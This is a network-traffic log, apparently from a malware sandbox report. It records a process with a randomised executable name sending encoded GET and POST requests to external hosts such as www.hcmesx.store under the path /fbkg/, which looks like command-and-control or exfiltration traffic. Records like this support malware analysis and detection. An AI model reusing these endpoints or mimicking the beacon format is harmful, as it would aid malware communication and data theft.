J9jwsRsb1zcFpsVhvfu0F/WIc2XtqU5BJ0IO8zSyADTY7bFSik/daOr7KKgV4pQBKxqwq01dczXTN2OfiWdC2gfraQPimWSVWlYcPgeKlmWB8l9M8sBjQa5wZZvJIYJ2IKfhdxzqvR1Kq6Os7rbDfV6wYQRWk3RCynXYstv0iBd9DEt9GeCGAhxwZ+Ny9
                                                                                                                                                                                                Nov 17, 2023 19:31:43.485375881 CET1265OUTData Raw: 6b 38 6b 6b 4c 52 31 45 65 75 65 70 47 5a 77 6b 4c 62 7a 63 4f 54 78 61 2b 4e 35 75 34 57 61 59 50 31 43 69 6a 68 51 72 6d 68 42 66 73 44 48 44 31 68 30 62 65 76 57 68 6a 72 64 48 5a 47 46 6e 67 4c 72 2b 7a 69 2b 6e 58 72 68 6d 63 30 70 52 6f 53
                                                                                                                                                                                                Data Ascii: k8kkLR1EeuepGZwkLbzcOTxa+N5u4WaYP1CijhQrmhBfsDHD1h0bevWhjrdHZGFngLr+zi+nXrhmc0pRoS6HfswVIoQvioBgNTtIQPZntGN8HBguku10I6RZTWFdqZqZ2EPNDdOvKYh4qQH8NMn+VQG0QNfy34YxsuPeZly3oCGogWllAu96eAraOq9tZUE+ZhTcuPy4mmRQHCV69JmeqbkaVPK7s9J/rQrCOYmTssi44wcarCS
                                                                                                                                                                                                Nov 17, 2023 19:31:43.485491037 CET1272OUTData Raw: 55 70 72 69 49 75 39 6f 78 77 36 2b 6f 4e 63 4c 4d 78 37 31 6f 70 52 30 6e 57 2b 63 63 4a 65 56 57 54 49 37 30 4d 46 77 52 53 41 44 71 4d 4f 30 55 35 45 39 73 33 78 6b 6e 6f 6c 32 44 6b 41 4d 34 6f 6a 38 41 38 36 46 43 67 44 52 31 62 41 4b 2b 77
                                                                                                                                                                                                Data Ascii: UpriIu9oxw6+oNcLMx71opR0nW+ccJeVWTI70MFwRSADqMO0U5E9s3xknol2DkAM4oj8A86FCgDR1bAK+wMvyrA1+9ulppc1b0AbIA7XJJMVlnEy6VykAa6pOytndMuokMV2JK/CAvbFLyDvpcCSgZhh2BW+b6i8nFF0Yv2XKPs4TA7NMm0TPXy6tnchmjMGgCbMXpuYWQLxUN66/VnTCxlrNgKwT3rIVbPASXowku5QVbKCzbj
                                                                                                                                                                                                Nov 17, 2023 19:31:43.485538006 CET1273INHTTP/1.1 405 Not Allowed
                                                                                                                                                                                                date: Fri, 17 Nov 2023 18:31:43 GMT
                                                                                                                                                                                                content-type: text/html
                                                                                                                                                                                                content-length: 556
                                                                                                                                                                                                server: NginX
                                                                                                                                                                                                connection: close
                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                Nov 17, 2023 19:31:43.485887051 CET1276OUTData Raw: 70 70 77 47 62 6a 73 72 7a 58 50 43 49 4f 6a 39 67 72 69 38 79 34 66 41 2b 4f 63 4a 45 33 38 64 74 39 64 34 61 4c 73 36 63 4c 71 63 67 59 4d 57 31 65 66 39 52 74 67 61 54 35 6f 44 71 50 4c 57 38 31 56 41 4b 77 44 54 31 57 44 42 47 46 65 53 6b 74
                                                                                                                                                                                                Data Ascii: ppwGbjsrzXPCIOj9gri8y4fA+OcJE38dt9d4aLs6cLqcgYMW1ef9RtgaT5oDqPLW81VAKwDT1WDBGFeSktl3DlolBayLcd56aI82Xxmoe5obB6D6tM0XDPBALn7UmrO5mnQrg9F3RyPLksXFDRFXwk6e2VUxnyOHAhRoU2vNB3zcowfdQBmou4YKZPJEm5QBieM0bUtzKP1fVg7hGWQytaO36C/LAO6LckuAn56RKp3duVIQqsd
                                                                                                                                                                                                Nov 17, 2023 19:31:43.486054897 CET1280OUTData Raw: 36 6a 76 4f 52 44 4f 45 54 68 55 31 71 39 48 47 71 31 34 4c 66 53 50 70 58 75 47 69 70 72 44 72 73 34 39 48 6f 72 33 6a 4e 4f 31 65 55 56 37 54 35 48 51 66 41 74 4d 69 43 52 33 36 57 77 43 66 62 59 52 6e 6f 45 63 4a 49 46 73 59 5a 76 56 64 64 51
                                                                                                                                                                                                Data Ascii: 6jvORDOEThU1q9HGq14LfSPpXuGiprDrs49Hor3jNO1eUV7T5HQfAtMiCR36WwCfbYRnoEcJIFsYZvVddQzCB6wzXAIcMh6kDRGGXI8wqErw/dzFBGXGEzXprxIpPd4xFJocF4FK7U+oC4XDR0m8GRshT9ed3ZcAPsDfqE1KExHGJ13lN2Vy6e8EN65kzRIS2ZQbQo7MaWadut6+/HFv45Jswb64JpVmtVyIDG48vV1NTiZIntO
                                                                                                                                                                                                Nov 17, 2023 19:31:43.486221075 CET1281OUTData Raw: 35 46 52 64 47 79 51 6a 51 38 51 31 63 61 73 76 63 48 43 6f 67 7a 57 38 37 4a 66 78 7a 70 6a 50 67 33 4b 4a 43 51 62 46 41 6f 74 2b 49 61 53 35 63 53 48 48 52 2b 33 39 47 65 6c 73 73 59 47 30 4b 54 39 37 31 50 33 52 2b 38 31 71 59 75 55 6b 4d 36
                                                                                                                                                                                                Data Ascii: 5FRdGyQjQ8Q1casvcHCogzW87JfxzpjPg3KJCQbFAot+IaS5cSHHR+39GelssYG0KT971P3R+81qYuUkM6+Z1TcUvvpTyploxtoHfhSBxfG7oQeJDssjXdzKefq0Hd5x8+3+xaHaFRZU2VCPHJexhsttuPw20pOe1EmtZ+yCmL7NiEredatEp6oIdTWKwVfJ+0qUpNPoxn61hpSUyEzkXWPzM/x4LF53A2I4vJJTGL6GIJBp3yh
                                                                                                                                                                                                Nov 17, 2023 19:31:43.486392021 CET1284OUTData Raw: 57 59 74 6a 30 58 71 50 34 35 64 71 35 49 5a 34 75 42 61 47 38 59 61 68 79 39 37 65 70 6f 54 45 4a 53 62 31 55 36 59 79 55 2f 6b 54 6a 59 73 35 4c 62 74 50 6e 61 48 5a 57 57 47 65 6f 48 6c 5a 4f 44 45 71 7a 49 36 66 6d 50 64 43 35 53 6b 49 67 4f
                                                                                                                                                                                                Data Ascii: WYtj0XqP45dq5IZ4uBaG8Yahy97epoTEJSb1U6YyU/kTjYs5LbtPnaHZWWGeoHlZODEqzI6fmPdC5SkIgORwkT7mfhvhKSijACGB8ccIQZBmofWIvpEy4bRrRvVhBmV8Q045T8XfjQXbSWXp0GYJsdCH5B5x+iWGjp2rSRqiHgn9UEkqve0hFP0MwOV4ntu1tkD4TwFTGKoRHH0jmstHAN/OdEqhV48imxFr1AabL3UiqbgLe3z
                                                                                                                                                                                                Nov 17, 2023 19:31:43.673955917 CET1291OUTData Raw: 4e 38 57 66 6e 39 4d 48 62 35 70 75 63 49 53 62 71 65 79 6d 36 4b 54 72 6b 6a 32 77 75 76 54 48 45 58 34 2f 54 51 51 61 52 58 6f 6e 73 51 37 7a 59 64 66 47 64 6c 56 58 69 41 79 46 4c 31 57 33 43 71 6f 57 30 51 71 32 63 44 2b 66 6e 4c 77 34 6a 2b
                                                                                                                                                                                                Data Ascii: N8Wfn9MHb5pucISbqeym6KTrkj2wuvTHEX4/TQQaRXonsQ7zYdfGdlVXiAyFL1W3CqoW0Qq2cD+fnLw4j+5g+c9khP4QaDNZYUZxL+g9TS4vSlxR2nXjxxLkRUjMWIjz9Lr39LFJjy3t/Nsnl2H7NPQwObFzyP60aoIk4mKy5gXDLLTAfoJLBkAJ9FTv6PPzlNcQOolGa7ou3ZfmQLRPdgH1GK/vuxAtpIkD9y+j85gfW3ZyUii
                                                                                                                                                                                                Nov 17, 2023 19:31:43.674063921 CET1298OUTData Raw: 73 56 43 4d 6e 65 7a 71 58 34 30 56 4e 69 4d 67 37 4c 37 5a 4b 7a 42 41 78 30 68 4a 59 54 48 48 4a 33 4b 49 6b 56 38 6a 75 7a 45 78 48 79 73 46 44 47 35 57 4f 69 39 79 46 39 48 73 45 74 39 62 43 72 7a 70 62 37 42 67 6f 46 6c 78 44 6e 4b 43 32 72
                                                                                                                                                                                                Data Ascii: sVCMnezqX40VNiMg7L7ZKzBAx0hJYTHHJ3KIkV8juzExHysFDG5WOi9yF9HsEt9bCrzpb7BgoFlxDnKC2rAYnEYjjzG6URs+PmLot8c3qd7Ul9sOpaDu/bAP30p2SKXmgXpQbOb7uT9Npl7lfWFiRYhZ+QlHcvEOFc1uRrYKTFvjp6D8U4UWJypMNoCEqnv/MMM4AiHPxdN5+IlMlcyPiSMSQolrv86gLFDSZP7JjkThuDpCTBm


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                63192.168.11.205019091.195.240.12380C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:31:46.013465881 CET1300OUTGET /fbkg/?Nx1L1=526dgl_phJ&T6I=B+yQ+pjtA1uH9kIbT9UDa6ioLlAzFDWribQtTvCQrHw4q8RUF3EGwezQb+sVDJCf8fKvHmDMhbppDTWW+s4B7GFBFpTEoA5eSA== HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.bellcom.media
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Nov 17, 2023 19:31:46.201169968 CET1300INHTTP/1.1 436
                                                                                                                                                                                                date: Fri, 17 Nov 2023 18:31:46 GMT
                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                server: NginX
                                                                                                                                                                                                connection: close


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                6391.195.240.12380192.168.11.2050190C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:31:46.013465881 CET1300OUTGET /fbkg/?Nx1L1=526dgl_phJ&T6I=B+yQ+pjtA1uH9kIbT9UDa6ioLlAzFDWribQtTvCQrHw4q8RUF3EGwezQb+sVDJCf8fKvHmDMhbppDTWW+s4B7GFBFpTEoA5eSA== HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.bellcom.media
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Nov 17, 2023 19:31:46.201169968 CET1300INHTTP/1.1 436
                                                                                                                                                                                                date: Fri, 17 Nov 2023 18:31:46 GMT
                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                server: NginX
                                                                                                                                                                                                connection: close


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                64192.168.11.205019138.59.48.8680C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:31:51.379434109 CET1301OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.hcmesx.store
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 184
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.hcmesx.store
                                                                                                                                                                                                Referer: http://www.hcmesx.store/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 45 73 6e 65 31 38 33 7a 70 35 41 69 31 41 57 30 5a 61 5a 39 74 6d 35 6a 74 71 58 5a 6c 4d 34 42 36 67 6f 77 48 4e 35 4c 4a 74 38 7a 39 77 53 6f 72 4f 73 4a 2f 68 42 36 64 65 4e 6c 6e 35 75 7a 56 55 79 57 64 46 65 72 34 51 4a 59 68 5a 79 77 70 35 32 58 6f 46 73 77 57 74 54 49 66 52 6f 53 4d 71 54 38 66 37 59 4c 75 59 34 6e 2b 69 45 31 78 58 63 38 76 62 4e 43 6d 67 77 51 42 69 4f 45 67 38 2b 70 73 70 63 35 62 4f 37 39 4d 4b 50 76 67 56 69 41 66 66 74 4c 32 73 57 79 56 54 45 2b 72 54 35 6f 66 2f 75 31 2f 7a 67 72 35 2f 35 43 52 67 3d 3d
                                                                                                                                                                                                Data Ascii: T6I=Esne183zp5Ai1AW0ZaZ9tm5jtqXZlM4B6gowHN5LJt8z9wSorOsJ/hB6deNln5uzVUyWdFer4QJYhZywp52XoFswWtTIfRoSMqT8f7YLuY4n+iE1xXc8vbNCmgwQBiOEg8+pspc5bO79MKPvgViAfftL2sWyVTE+rT5of/u1/zgr5/5CRg==
                                                                                                                                                                                                Nov 17, 2023 19:31:51.546437025 CET1302INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:31:52 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                Data Raw: 31 62 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 52 c1 6e 13 31 10 bd f7 2b 8c 11 12 48 bb eb 4d ab 4a 68 b3 bb a8 0a 29 07 22 b5 aa c2 a1 27 e4 d8 26 eb 76 6d af ec 49 d2 50 55 e2 c2 5f 70 ab 8a b8 f4 ce a5 3f 53 51 c4 67 60 af 43 8b 2a f0 c5 7e 33 e3 f7 9e c7 53 3e 79 7d 30 9a 1e 1f 8e 51 03 aa ad b7 ca 3f 9b a0 dc 23 c7 ac ec 00 b1 86 5a 27 a0 c2 ef a6 fb e9 4b 8c 24 af f0 64 ef fd e8 60 32 19 8f a6 18 39 cb 2a 4c 88 e3 a7 d9 ee 20 6b 29 39 71 a9 07 69 67 4d a6 a4 ce 4e 1c ae 4b 12 c9 ee 59 eb c9 5e 26 b5 84 e7 e7 92 17 f8 ed 78 be 86 23 da 6e 2f f6 cd 0e 6c bf c1 09 3b fd 47 f4 e2 c5 03 0f 2a 95 00 fa d8 5c bd 85 fc 8a a9 e0 73 29 c5 aa 33 16 30 d2 54 89 bf 31 33 1a 84 f6 af 5a 49 0e 4d c5 c5 52 32 91 f6 20 f1 ae a5 5a a8 d4 31 da 8a 6a 90 e5 89 a2 67 8f 22 0b 27 6c 5f 40 67 be 46 1b ec a5 a3 38 48 68 45 fd f3 fa f2 ee cb b7 5f 37 37 77 9f af 7e 7c bf be fd f4 b5 24 31 13 ab 1c ac 7d 55 7f 0e 2b 74 3e 99 19 be 4e e4 07 eb ad 9e f7 4e 0a 34 c8 f3 67 c3 46 c8 79 03 1b d0 51 ce a5 9e 17 28 1f 2a 6a e7 52 fb d3 c5 3d cf d3 95 a5 dd ff 2f 3f 14 6e 64 66 c6 72 61 0b a4 8d 16 c3 98 f5 3d 8e de 4a d2 c4 41 08 be fc cf 71 b9 ec 3f 3f 48 84 e7 86 4e 47 9a 38 03 0d 40 e7 0a 42 f8 d9 5a c1 c7 7c 27 63 8c b0 8e e5 bb e4 95 9f 21 ad 45 3b 32 5c 54 7d 28 8c 44 bc eb 89 89 67 0e db 46 87 f4 63 f8 1b 64 53 ca f5 9d 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 1b7uRn1+HMJh)"'&vmIPU_p?SQg`C*~3S>y}0Q?#Z'K$d`29*L k)9qigMNKY^&x#n/l;G*\s)30T13ZIMR2 Z1jg"'l_@gF8HhE_77w~|$1}U+t>NN4gFyQ(*jR=/?ndfra=JAq??HNG8@BZ|'c!E;2\T}(DgFcdS0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                6438.59.48.8680192.168.11.2050191C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:31:51.379434109 CET1301OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.hcmesx.store
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 184
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.hcmesx.store
                                                                                                                                                                                                Referer: http://www.hcmesx.store/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 45 73 6e 65 31 38 33 7a 70 35 41 69 31 41 57 30 5a 61 5a 39 74 6d 35 6a 74 71 58 5a 6c 4d 34 42 36 67 6f 77 48 4e 35 4c 4a 74 38 7a 39 77 53 6f 72 4f 73 4a 2f 68 42 36 64 65 4e 6c 6e 35 75 7a 56 55 79 57 64 46 65 72 34 51 4a 59 68 5a 79 77 70 35 32 58 6f 46 73 77 57 74 54 49 66 52 6f 53 4d 71 54 38 66 37 59 4c 75 59 34 6e 2b 69 45 31 78 58 63 38 76 62 4e 43 6d 67 77 51 42 69 4f 45 67 38 2b 70 73 70 63 35 62 4f 37 39 4d 4b 50 76 67 56 69 41 66 66 74 4c 32 73 57 79 56 54 45 2b 72 54 35 6f 66 2f 75 31 2f 7a 67 72 35 2f 35 43 52 67 3d 3d
                                                                                                                                                                                                Data Ascii: T6I=Esne183zp5Ai1AW0ZaZ9tm5jtqXZlM4B6gowHN5LJt8z9wSorOsJ/hB6deNln5uzVUyWdFer4QJYhZywp52XoFswWtTIfRoSMqT8f7YLuY4n+iE1xXc8vbNCmgwQBiOEg8+pspc5bO79MKPvgViAfftL2sWyVTE+rT5of/u1/zgr5/5CRg==
                                                                                                                                                                                                Nov 17, 2023 19:31:51.546437025 CET1302INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:31:52 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                Data Raw: 31 62 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 52 c1 6e 13 31 10 bd f7 2b 8c 11 12 48 bb eb 4d ab 4a 68 b3 bb a8 0a 29 07 22 b5 aa c2 a1 27 e4 d8 26 eb 76 6d af ec 49 d2 50 55 e2 c2 5f 70 ab 8a b8 f4 ce a5 3f 53 51 c4 67 60 af 43 8b 2a f0 c5 7e 33 e3 f7 9e c7 53 3e 79 7d 30 9a 1e 1f 8e 51 03 aa ad b7 ca 3f 9b a0 dc 23 c7 ac ec 00 b1 86 5a 27 a0 c2 ef a6 fb e9 4b 8c 24 af f0 64 ef fd e8 60 32 19 8f a6 18 39 cb 2a 4c 88 e3 a7 d9 ee 20 6b 29 39 71 a9 07 69 67 4d a6 a4 ce 4e 1c ae 4b 12 c9 ee 59 eb c9 5e 26 b5 84 e7 e7 92 17 f8 ed 78 be 86 23 da 6e 2f f6 cd 0e 6c bf c1 09 3b fd 47 f4 e2 c5 03 0f 2a 95 00 fa d8 5c bd 85 fc 8a a9 e0 73 29 c5 aa 33 16 30 d2 54 89 bf 31 33 1a 84 f6 af 5a 49 0e 4d c5 c5 52 32 91 f6 20 f1 ae a5 5a a8 d4 31 da 8a 6a 90 e5 89 a2 67 8f 22 0b 27 6c 5f 40 67 be 46 1b ec a5 a3 38 48 68 45 fd f3 fa f2 ee cb b7 5f 37 37 77 9f af 7e 7c bf be fd f4 b5 24 31 13 ab 1c ac 7d 55 7f 0e 2b 74 3e 99 19 be 4e e4 07 eb ad 9e f7 4e 0a 34 c8 f3 67 c3 46 c8 79 03 1b d0 51 ce a5 9e 17 28 1f 2a 6a e7 52 fb d3 c5 3d cf d3 95 a5 dd ff 2f 3f 14 6e 64 66 c6 72 61 0b a4 8d 16 c3 98 f5 3d 8e de 4a d2 c4 41 08 be fc cf 71 b9 ec 3f 3f 48 84 e7 86 4e 47 9a 38 03 0d 40 e7 0a 42 f8 d9 5a c1 c7 7c 27 63 8c b0 8e e5 bb e4 95 9f 21 ad 45 3b 32 5c 54 7d 28 8c 44 bc eb 89 89 67 0e db 46 87 f4 63 f8 1b 64 53 ca f5 9d 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 1b7uRn1+HMJh)"'&vmIPU_p?SQg`C*~3S>y}0Q?#Z'K$d`29*L k)9qigMNKY^&x#n/l;G*\s)30T13ZIMR2 Z1jg"'l_@gF8HhE_77w~|$1}U+t>NN4gFyQ(*jR=/?ndfra=JAq??HNG8@BZ|'c!E;2\T}(DgFcdS0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                65192.168.11.205019238.59.48.8680C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:31:54.068592072 CET1303OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.hcmesx.store
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 524
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.hcmesx.store
                                                                                                                                                                                                Referer: http://www.hcmesx.store/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 45 73 6e 65 31 38 33 7a 70 35 41 69 7a 68 6d 30 66 37 5a 39 34 32 35 67 68 4b 58 5a 72 73 35 47 36 67 73 77 48 49 5a 68 4a 59 55 7a 39 56 32 6f 71 50 73 4a 38 68 42 36 49 75 4e 67 6a 35 75 73 56 55 33 72 64 41 6d 72 34 52 74 59 67 72 4b 77 75 4a 32 55 69 6c 73 7a 65 4e 54 4a 49 42 6f 49 4d 71 66 67 66 2f 51 4c 75 6f 6b 6e 2f 67 73 31 6d 7a 6f 2f 6f 37 4d 4c 75 41 77 54 61 79 50 46 67 38 43 62 73 72 4d 70 61 34 4c 39 4e 71 76 76 6a 56 69 44 4b 66 74 4d 36 4d 58 75 52 78 4a 71 7a 53 6f 57 65 4b 32 52 6e 42 64 41 37 4c 35 48 53 6e 6e 79 32 52 73 44 6c 73 75 6e 2f 68 54 59 37 67 2f 2b 79 73 52 72 79 47 48 55 52 46 68 61 43 45 35 69 5a 2f 39 58 48 70 77 4d 58 79 55 4e 65 72 48 44 55 6d 44 5a 69 53 74 6b 2b 78 78 52 76 65 75 39 63 71 4f 79 64 6a 64 48 46 75 59 47 59 6a 43 76 71 6e 48 44 72 45 31 4c 33 62 4f 4a 43 73 68 69 6d 33 68 67 38 78 66 76 4d 7a 68 63 42 4b 61 44 52 77 78 78 4c 4b 6a 2b 6e 52 4f 42 56 72 4d 71 42 2b 49 4a 45 4c 31 65 77 78 74 6b 71 33 66 31 5a 5a 41 56 4d 6b 54 38 33 50 68 4b 79 70 7a 55 44 70 42 7a 35 37 6b 37 57 4e 59 2f 6b 34 76 33 73 31 41 57 30 54 4e 38 2f 42 35 4a 67 52 50 59 31 46 56 5a 55 48 6d 43 4c 43 49 67 4f 4e 38 64 69 5a 43 6f 63 35 4f 6c 35 68 65 52 42 35 57 58 61 73 43 66 75 47 79 70 42 75 65 45 32 59 69 6c 2b 4e 6a 63 38 33 77 6a 37 6d 61 2f 77 41 73 66 6f 63 52 45 72 46 33 42 4f 2f 30 76 6d 42 55 78 52 52 54 47 50 44 63 6d 6e 76 42 42 30 54 77 61 66 6e 70 55 6a 69 6e 78 4e 2f 6a 66 4d 64 6d 35 6b 75 6a 57 7a 72 72 4c 46 55 4d 4b 58 6b 58 43 39 33 61 48 67 74 5a 76 59 57 65 63 78 48 37 6e 35 5a 6b 3d
                                                                                                                                                                                                Data Ascii: T6I=Esne183zp5Aizhm0f7Z9425ghKXZrs5G6gswHIZhJYUz9V2oqPsJ8hB6IuNgj5usVU3rdAmr4RtYgrKwuJ2UilszeNTJIBoIMqfgf/QLuokn/gs1mzo/o7MLuAwTayPFg8CbsrMpa4L9NqvvjViDKftM6MXuRxJqzSoWeK2RnBdA7L5HSnny2RsDlsun/hTY7g/+ysRryGHURFhaCE5iZ/9XHpwMXyUNerHDUmDZiStk+xxRveu9cqOydjdHFuYGYjCvqnHDrE1L3bOJCshim3hg8xfvMzhcBKaDRwxxLKj+nROBVrMqB+IJEL1ewxtkq3f1ZZAVMkT83PhKypzUDpBz57k7WNY/k4v3s1AW0TN8/B5JgRPY1FVZUHmCLCIgON8diZCoc5Ol5heRB5WXasCfuGypBueE2Yil+Njc83wj7ma/wAsfocRErF3BO/0vmBUxRRTGPDcmnvBB0TwafnpUjinxN/jfMdm5kujWzrrLFUMKXkXC93aHgtZvYWecxH7n5Zk=
                                                                                                                                                                                                Nov 17, 2023 19:31:54.234873056 CET1304INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
